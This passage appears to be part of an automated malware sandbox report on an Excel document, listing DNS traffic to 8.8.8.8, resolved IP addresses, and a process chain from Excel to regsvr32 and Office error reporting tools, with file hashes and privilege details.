Jan 11, 2021 18:28:36.987488985 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.115564108 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.163610935 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.174900055 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.225476980 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.506975889 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.555064917 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.562401056 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.610411882 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 11, 2021 18:27:59.845685959 CET | 192.168.2.22 | 8.8.8.8 | 0x26d4 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 11, 2021 18:27:59.992686987 CET | 8.8.8.8 | 192.168.2.22 | 0x26d4 | No error (0) | 199.59.242.150 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | 104.18.10.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | 104.18.11.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | 104.18.11.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | 104.18.10.39 | A (IP address) | IN (0x0001) |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 18:27:41 |
Start date: | 11/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f530000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:27:48 |
Start date: | 11/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffe30000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:28:06 |
Start date: | 11/01/2021 |
Path: | C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f3f0000 |
File size: | 995024 bytes |
MD5 hash: | 45A078B2967E0797360A2D4434C41DB4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 18:28:06 |
Start date: | 11/01/2021 |
Path: | C:\Windows\System32\DWWIN.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff840000 |
File size: | 152576 bytes |
MD5 hash: | 25247E3C4E7A7A73BAEEA6C0008952B1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Disassembly |
---|
Code Analysis |
---|